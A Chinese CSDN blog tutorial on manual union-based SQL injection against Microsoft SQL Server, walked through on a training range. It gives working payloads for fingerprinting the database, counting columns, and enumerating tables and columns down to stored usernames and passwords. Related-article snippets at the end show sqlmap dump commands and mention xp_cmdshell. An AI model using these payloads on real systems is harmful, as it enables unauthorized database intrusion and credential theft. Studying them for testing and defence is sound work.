MSSQL数据库注入(一)

最新推荐文章于 2024-06-18 10:57:24 发布
最新推荐文章于 2024-06-18 10:57:24 发布
阅读量5.3k 收藏 27
点赞数 6
文章标签: mysql 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hhhshd/article/details/121356157
版权

1. MSSQL注入手工联合注入

mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。

  • (例如:在mssql中只能用top 取代limt 0,N,row_number() over()函数取代limit N,M)
    mssql在使用上和可移植等方面与mysql存在不同的差异。

MSSQL数据库的基本知识

  • MSSQL中自带数据库信息
库名相关功能
master系统控制数据库,包含配置信息,用户登录信息,系统运行状态
model模板数据库,数据库时建立所有数据库的模板。
tempdb临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件
msdb主要为用户使用,记录着计划信息、事件处理信息、数据备份、警告以及异常信息
  • MSSQL系统视图表 (MSSQL数据库与MYSQL数据库一样,自带数据表sysobjects和syscolumns)
视图表功能
sysobjects记录了数据库中所有表,常用字段为id、name和xtype
syscolumns记录了数据库中所有表的字段,常用字段为id、name和xtype
sys.databasesSQL Server 中所有的数据库
sys.sql_loginsSQL Server 中所有的登录名
information_schema.tables当前用户数据库的表
information_schema.columns当前用户数据库的列
sys.database_files存储在数据库中数据库文件

Mssql数据库手工联合注入

这里我们使用的靶场环境为墨者学院中Sql Server注入环境
在这里插入图片描述

  1. 判断是否是Mssql数据库类型

and exists(select * from sysobjects) –
and exists(select count(*) from sysobjects) –

  • 输入上面的mssql手工注入代码时候,如果不存在报错,更改命令中的代码信息就产生报错,则可以判断数据库类型为Mssql数据库
    在这里插入图片描述在这里插入图片描述
  1. 判断mssql数据库的字段长度

order by 5

此处发现order by 5会报错,那我们使用4试试
在这里插入图片描述

  • 我们发现字段为4未出现报错,所以注入的字段数为4
    在这里插入图片描述
  1. 寻找字符型的显示位置
  • 注意:在mssql中查找显示位时需要在union select中间添加all,因为union select在mssql中会重复一些字段从而导致报错
  • null 表示无论是数字形式还是字符形式

id=-2 and union all select null,null,null,null

在这里插入图片描述
4. 通过更改null的字符进行判断显示

id=-2 and union all select null,‘2’,‘3’,null

  • 通过第二个和第三个我们发现判断显示的位置,我们获取数据库信息也从这两个显示位置注入。
    在这里插入图片描述
  1. 通过命令对数据库进行相关查询

@@version-:获取版本信息
db_name():数据库名字
user,system_user,current_user,user_name:获取当前⽤户名
@@SERVERNAME:获取有关服务器主机的信息

  1. 查询mssql数据库的版本信息

id=-2 and union all select null,@@verions,‘3’,null

  • 这里我们看见mssql数据库的版本信息为sql server 2005
    在这里插入图片描述
  1. 查询并获取出数据库名

id=-2 union all select null,db_name(),‘3’,null

在这里插入图片描述

  1. 通过前面获取的数据库名称,获取表名,但是在MSSQL中查询表与MYSQL存在区别。

mysql查询表:union select 1,table_column,3,4 from information_schema.columns where table_name=‘数据库名称’
mssql查询表:union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’),‘3’,4

mssql查询表中只能用top进行对表的版本查询,top查询中xtype=‘u’表示对对xtype中值为u的时候进行搜索,只能是u,如果是其他的值并不能搜索出现
在这里插入图片描述
此已经查询到了manage数据表,我们通过添加一个条件语句,使得查询不是‘manage’名称的表就可以继续查询到下一个数据表了

union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in(‘manage’)),‘3’,4

在这里插入图片描述

9.发现数据表,我们可以继续查询表中对应的字段名称,通过col_name对表中进行查询
在这里插入图片描述

  • 通过修改在object_id(‘manage’)后面的数字就可以调整想要查看的字段

在这里插入图片描述

10.获取到了manage数据表的字段username和password后,我们就可以查看到相关信息
在这里插入图片描述

兔子呀~
关注
  • 6
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
MSSQL数据库注入
zhuangsle的博客
08-26 1056
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
MSSQL注入
AliceNo的博客
12-01 1536
SQL注入攻击的目标是通过向应用程序的输入中注入恶意的SQL代码,以绕过应用程序的身份验证和访问数据库的安全措施。为了防范MSSQL注入和其他SQL注入攻击,开发人员应该使用参数化查询或预处理语句,以确保用户输入不会直接嵌入到SQL语句中。此外,进行适当的输入验证和过滤也是关键的安全措施。理解MSSQL注入是学习网络安全的一部分,前提是您在合法、授权的环境中进行,用于了解如何保护您的应用程序免受此类攻击。在一些情况下,攻击者可以通过在一个查询中嵌套另一个查询来执行更复杂的数据库操作,比如删除表。
Web安全基础学习:SQL注入漏洞之Mssql注入
最新发布
qq_51862722的博客
06-18 893
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
MSSQL数据库注入全方位利用
weixin_42508548的博客
11-24 623
在渗透测试过程中遇到了MSSQL数据库,市面上也有一些文章,不过大多数讲述的都是如何快速利用注入漏洞getshell的,对于MSSQL数据库注入漏洞没有很详细地描述。在这里我查阅了很多资料,希望在渗透测试过程中遇到了MSSQL数据库能够相对友好地进行渗透测试,文章针对实战性教学,在概念描述方面有不懂的还请自行百度,谢谢大家~ 0x02 注入前准备 1、确定注入点 http://219.153.49.228:40574/new_list.asp?id=2 and 1=1
一款基于MSSQL数据库注入的利用工具-SqlmapXPlus
siu~
02-16 683
在众多的地区性攻防演练中,SQL Server数据库堆叠注入仍有较高的爆洞频率,但因为一些常见的演练场景限制,如不出网、低权限、站库分离、终端防护、上线困难、权限维持繁琐等,仅一个--os-shell已经难满足我们的需求。 SqlmapXPlus 基于 Sqlmap,对经典的数据库漏洞利用工具进行二开,参考各种解决方法,增加MSSQL数据库注入的利用方式。 目前已完成部分二开,包括ole、xpcmdshell两种文件上传、内存马上传、clr安装功能,能够实现mssql注入场景下的自动化注入内存马、自动化
mssql数据库注入
m0_57347472的博客
04-03 1693
db_name() 数据库名@@version 版本信息User_name() 当前用户host_name() 计算机名称。
注入之mssql数据库(手工注入
2301_79194110的博客
09-15 246
恢复 EXEC sp_configure 'show advanced options', 1;-- 判断当前数据库用户是否为db_owner权限。insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'-- 当前库testDB。没有xp_cmdshell。
mssql数据库注入-public权限
arissa666的博客
07-20 243
这种操作比较慢,可以用havij、穿山甲、sqlmap工具。
mssql数据库和Oracle数据库注入
cangyu51462的博客
05-05 8927
mssql数据库和Oracle数据库注入
MSSQL注入——反弹注入
m0_55854679的博客
02-18 901
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL数据库SQL注入手册1
08-08
MSSQL数据库SQL注入手册1
【技术分享】MSSQL数据库注入全方位利用 .pdf
09-05
总的来说,MSSQL数据库注入是一个涉及多种技术细节的复杂过程,需要对数据库系统有深入理解,才能有效地进行安全测试和防御。通过对这些概念和方法的学习,安全专业人员可以更好地保护企业免受数据库注入的威胁。
Python实现的连接mssql数据库操作示例
09-09
本文将详细讲解如何使用Python连接并操作MSSQL数据库,特别是针对SQL Server 2008 R2版本。 首先,要实现Python与MSSQL的连接,我们需要一个第三方库,即`pymssql`。在Python环境中,可以通过`pip`来安装这个模块。...
Android实现对MSSQL数据库的增删改查操作
06-05
下面是一个简单的示例,展示如何通过HTTP请求来实现对MSSQL数据库的增删改查操作。 首先,你需要在服务器端设置一个API接口,用于处理来自Android应用的请求。这里以Node.js为例,使用Express框架创建一个简单的API...
一个php+mssql 数据库连接类库
04-28
本压缩包提供了一个专用于PHP连接MSSQL数据库的类库,这对于PHP开发者来说是一个非常实用的工具。 标题中的“php+mssql 数据库连接类库”意味着这个类库将帮助PHP程序员创建一个到MSSQL服务器的连接,执行SQL查询,...
php连接MSSQL数据库的常用操作
12-14
本文将详细介绍PHP连接MSSQL数据库时的常用操作步骤和注意事项。 首先,确保PHP配置正确。在`php.ini`文件中,取消对`extension=php_pdo_mssql.dll`和`extension=php_pdo_odbc.dll`的注释,根据所选择的连接方式...
mssql高手注入.txt
07-18
SQL注入是一种常见的网络安全攻击手段,通过在应用程序接收的数据中插入恶意SQL语句来操纵后端数据库系统执行非授权命令或查询。对于MSSQL(Microsoft SQL Server)而言,由于其广泛的应用范围和复杂的功能特性,使...
MSSQL数据库连接配置源码(学习交流)_mssql_数据库源码_
09-28
下面是一段简单的C#代码示例,展示了如何使用ADO.NET连接并查询MSSQL数据库: ```csharp using System; using System.Data.SqlClient; class Program { static void Main() { string connectionString = "Server...
sqlmap直连MSSQL数据库
02-22
SQLMap是一款开源的自动化SQL注入工具,用于检测和利用Web应用程序中的SQL注入漏洞。它支持多种数据库管理系统,包括MSSQL。 要使用SQLMap直连MSSQL数据库,首先需要确保已经安装了Python和SQLMap。然后,按照以下步骤进行操作: 1. 打开命令行终端,并导航到SQLMap的安装目录。 2. 输入以下命令来检测目标网站是否存在SQL注入漏洞: ``` python sqlmap.py -u <目标URL> --dbs ``` 其中,`<目标URL>`是要测试的网站URL。 3. 如果存在SQL注入漏洞,SQLMap将列出可用的数据库。选择要攻击的数据库,并记下其名称。 4. 输入以下命令来获取数据库中的表: ``` python sqlmap.py -u <目标URL> -D <数据库名称> --tables ``` 其中,`<数据库名称>`是上一步选择的数据库名称。 5. 选择要攻击的表,并记下其名称。 6. 输入以下命令来获取表中的列: ``` python sqlmap.py -u <目标URL> -D <数据库名称> -T <表名称> --columns ``` 其中,`<表名称>`是上一步选择的表名称。 7. 选择要攻击的列,并记下其名称。 8. 输入以下命令来获取列中的数据: ``` python sqlmap.py -u <目标URL> -D <数据库名称> -T <表名称> -C "<列名称1>,<列名称2>,..." --dump ``` 其中,`<列名称1>,<列名称2>,...`是上一步选择的列名称,用逗号分隔。 9. SQLMap将尝试提取并显示列中的数据。 请注意,使用SQLMap进行SQL注入测试可能涉及到非法活动,应该仅在合法授权的范围内使用。此外,使用SQLMap进行攻击可能会对目标系统造成损害,应谨慎操作。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值